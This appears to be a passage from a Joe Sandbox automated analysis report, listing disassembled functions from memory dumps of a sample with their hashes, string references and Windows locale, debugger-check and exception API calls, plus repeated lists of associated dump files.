Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: ee63a0d30993e19db98d7f8dd8267f4446437e2d70eaf7ba8027b36f65a96d96
Instruction ID: 765d92c9df89bf4d789f75b86e9a24066f8c479561b8a536b754f0ca2d0d95a1
Opcode Fuzzy Hash: ee63a0d30993e19db98d7f8dd8267f4446437e2d70eaf7ba8027b36f65a96d96
Instruction Fuzzy Hash: CAB1C27092464B8BCF24CE68C4A66BEBBF1AF44314F344A1ED456E7291C731AE61CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0029D298 Relevance: 2.8, Strings: 2, Instructions: 314COMMON

Download Yara Rule

Strings

E-<E, xrefs: 0029D2A0
0, xrefs: 0029D422

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0$E-<E
API String ID: 0-1759747734
Opcode ID: 354e5bda1dfb7a1f8b404c1ce94b70da234273b5a80e9e1fdc1c368470f94230
Instruction ID: d742ea1209f17b79625d09da362a28fa1313ac9db5ebdd07c78748596c4745d0
Opcode Fuzzy Hash: 354e5bda1dfb7a1f8b404c1ce94b70da234273b5a80e9e1fdc1c368470f94230
Instruction Fuzzy Hash: 37B1D7B092060B8BCF24CF68C5956BFB7B1AF04304F540A69D852E7691C730EE65EF56

Uniqueness

Uniqueness Score: -1.00%

Function 002D0E83 Relevance: 2.5, Strings: 1, Instructions: 1260COMMON

Download Yara Rule

Strings

E-<E, xrefs: 002D0E8E

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: E-<E
API String ID: 0-3361631808
Opcode ID: 2188588680b2e872bc9fd7ccbb7c0be33ac356d211e4b0e953a84f0af981fc71
Instruction ID: b667eed93b55b43ec9d4956c2023c04c3ca0627594d5518d088f5e5254fa0f5a
Opcode Fuzzy Hash: 2188588680b2e872bc9fd7ccbb7c0be33ac356d211e4b0e953a84f0af981fc71
Instruction Fuzzy Hash: 01B24971E246299FDB65CE28CD407EAB3B9EB48305F1441EBD84DE7640E774AEA18F40

Uniqueness

Uniqueness Score: -1.00%

Function 0027C918 Relevance: 2.5, Strings: 1, Instructions: 1201COMMON

Download Yara Rule

Strings

/, xrefs: 0027D25C

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 87f4c66ff2f86ce1d068c81069a24f513e67418ebeca3fb75460282a540a0273
Instruction ID: 92f0d3f8e3d4b545e6b5bbb25b9b4938aaa767ad8b104cdd6b527501393fe57d
Opcode Fuzzy Hash: 87f4c66ff2f86ce1d068c81069a24f513e67418ebeca3fb75460282a540a0273
Instruction Fuzzy Hash: EF9262B2E7061A9BDB14DEB8CC96BED77B4AF14300F14813EE50AE7281DB78D9158B50

Uniqueness

Uniqueness Score: -1.00%

Function 002BE92B Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 002BEB58

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5ea6bfa7af20b6ceb25e77a0024654572df77fd844f18c77d34790e0340b4264
Instruction ID: fba848809029ab589bf41e0ea327fa4212a064d4956bda713f840e188992bcb3
Opcode Fuzzy Hash: 5ea6bfa7af20b6ceb25e77a0024654572df77fd844f18c77d34790e0340b4264
Instruction Fuzzy Hash: D0B13071620605DFDB15CF28C486BE57BE0FF453A5F268658E89ACF2A1C335E9A1CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002AEECB Relevance: 1.7, Strings: 1, Instructions: 481COMMON

Download Yara Rule

Strings

E-<E, xrefs: 002AEED6

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: E-<E
API String ID: 0-3361631808
Opcode ID: ff58ec4dded2a2dbfada0d8389f267396a23c92993c096ff13c3001e94f5de51
Instruction ID: 5448ddcb90d568f5ccd5d2297566c19ffc30a9c4586dee7c95ed88f081f60fef
Opcode Fuzzy Hash: ff58ec4dded2a2dbfada0d8389f267396a23c92993c096ff13c3001e94f5de51
Instruction Fuzzy Hash: 05126F71A202258FDF65CF58C980BAAB7F9FB4A304F1440EAD949EB244DB749E51CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00232671 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

E-<E, xrefs: 00247733, 002479B3

Memory Dump Source

Source File: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: E-<E
API String ID: 0-3361631808
Opcode ID: b9bc1c572f8a3197c105faca7e7372133601359ec9e90c4ad061175f931af80f
Instruction ID: de6a7d9ce5292bad0ecca952396e2597c14dfcd1b54b05eaa9a9f8ef7e9520f4
Opcode Fuzzy Hash: b9bc1c572f8a3197c105faca7e7372133601359ec9e90c4ad061175f931af80f
Instruction Fuzzy Hash: 49A17B729283419FC709DF28C840A2EFBE5BFC8704F444A1DF8D9A7251E774E9649B92

Uniqueness

Uniqueness Score: -1.00%

Function 002B30A0 Relevance: 1.6, Strings: 1, Instructions: 386COMMON

Download Yara Rule

Strings

E-<E, xrefs: 002B30AB

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID: E-<E
API String ID: 0-3361631808
Opcode ID: 07d73d9ba9c43526bb104385ca81469304f8c4100fc58ea4fccc9be33b77592b
Instruction ID: caa892c824724c3ada4dd767b0ab5887f62566c31078ffff47c4814b5c8ad5f6
Opcode Fuzzy Hash: 07d73d9ba9c43526bb104385ca81469304f8c4100fc58ea4fccc9be33b77592b
Instruction Fuzzy Hash: A3E18D71A102299FCB26DF58CC80BEAB7B8FF46344F1440EAD949AB241D7719F918F91

Uniqueness

Uniqueness Score: -1.00%

Function 002B6973 Relevance: 1.6, Instructions: 1571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a09ce6013e0ccc67ddf4f355f161f05d9172b25eba11177fe61f312e29a8906
Instruction ID: 76895ae084f334da23018c6f34e77a9c5f1367657d29acb3fcd4bac99d98f9f3
Opcode Fuzzy Hash: 6a09ce6013e0ccc67ddf4f355f161f05d9172b25eba11177fe61f312e29a8906
Instruction Fuzzy Hash: AD72BF74A1020A9FCF18DF68C895AFEB7B5EF84344F1441A9EC46AB345D731AE52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002CEEFD Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(002CF06B,00000001), ref: 002CEF6F

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 68d57f994b9a50b2e4ed7b59dc3ca745c50224d235fe3bb5709afbbdbfa5024e
Instruction ID: b26b892a0d2a0d1ab00f77ac488906e3aab47f3d608f96cf925e35a8de313abc
Opcode Fuzzy Hash: 68d57f994b9a50b2e4ed7b59dc3ca745c50224d235fe3bb5709afbbdbfa5024e
Instruction Fuzzy Hash: C01129366147019FDF189F39C895A7ABB92FF80758B19493CE98687A40D3757812CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002C8EA7 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 002C8EAE

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: DebuggerPresent
String ID:
API String ID: 1347740429-0
Opcode ID: 6a572577bc467e3ba248d55e0ea6e6fe9e4b2509acfb0ca3efc36efcc20a7196
Instruction ID: e46c6cc84d5a0f3878a7790e4b70573f172f775e7918b34008e86d9dbfac53f0
Opcode Fuzzy Hash: 6a572577bc467e3ba248d55e0ea6e6fe9e4b2509acfb0ca3efc36efcc20a7196
Instruction Fuzzy Hash: 5FF0A4B2031216BADE217E914C42FBB2B4AEF11361F14851AFD0596141DF21E971D9F2

Uniqueness

Uniqueness Score: -1.00%

Function 002CF60C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002CF287,00000000,00000000,?), ref: 002CF638

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d3205d2f9234b0dbf7d31c79e0360be989604a740bc4c3a118ec25587f384c31
Instruction ID: 77b1a14031c6735d8defed4bb2a0cf4a45455d6155e3321f21ee05707a305f23
Opcode Fuzzy Hash: d3205d2f9234b0dbf7d31c79e0360be989604a740bc4c3a118ec25587f384c31
Instruction Fuzzy Hash: F5F0F932620112BBDB285E65C909FBA776DEB40754F24463DED25A3190EA74FE21C990

Uniqueness

Uniqueness Score: -1.00%

Function 002CEFBE Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(002CF352,00000001), ref: 002CF008

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: bd2a8552553a248b8a69bba7e07976b9306cea0030d023497947f86a8c4253fe
Instruction ID: f5084190b706135ca8cb6bb944ec62437ee23fe1f07c11ed65c530afce79d29c
Opcode Fuzzy Hash: bd2a8552553a248b8a69bba7e07976b9306cea0030d023497947f86a8c4253fe
Instruction Fuzzy Hash: 16F022362103056FDB245F35D881B6A7B92FB80768F09453DF9054B680C6B1AC02CB00

Uniqueness

Uniqueness Score: -1.00%

Function 002725C2 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002), ref: 002725DB

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 89a7a452de1da3d0c066d0dd2a56b2694d721b9fd70bcf9ac647382c3b3f4fa1
Instruction ID: 344b5a9d71175f400a29486526680b056b6208422dfdc85755944be9fe4053ad
Opcode Fuzzy Hash: 89a7a452de1da3d0c066d0dd2a56b2694d721b9fd70bcf9ac647382c3b3f4fa1
Instruction Fuzzy Hash: 10E092722B0205F6D719DFBC9A1FF6A76ACE70174AF508541F106E50C1D6B0CB14A551

Uniqueness

Uniqueness Score: -1.00%

Function 002CEE7B Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(002CEDAB,00000001), ref: 002CEEB2

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042148744.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.000000000033E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042163854.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 0366fbe6afb2aced041633f73600e98134fe72ed7a930e7ee80571f97b4a772e
Instruction ID: f21d8f0866b067bab7ca0b6449d8e48c664398c7819a50f6a52b187a9fb053cb
Opcode Fuzzy Hash: 0366fbe6afb2aced041633f73600e98134fe72ed7a930e7ee80571f97b4a772e
Instruction Fuzzy Hash: 92F0E53671020597CF05AF76D849B6ABF94EFC1760F07445DEA068B290C6759D53CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002C22BD Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?), ref: 002C22F1

Memory Dump Source

Source File: 00000000.00000002.2041978620.000000000023F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.2041959962.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.000000000023B000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041978620.00000000002E0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042083661.00000000002E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042103802.00000000002FB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042132039.000000000032F000.00000040.00000001.01000000.00000003.sdmpDownload File
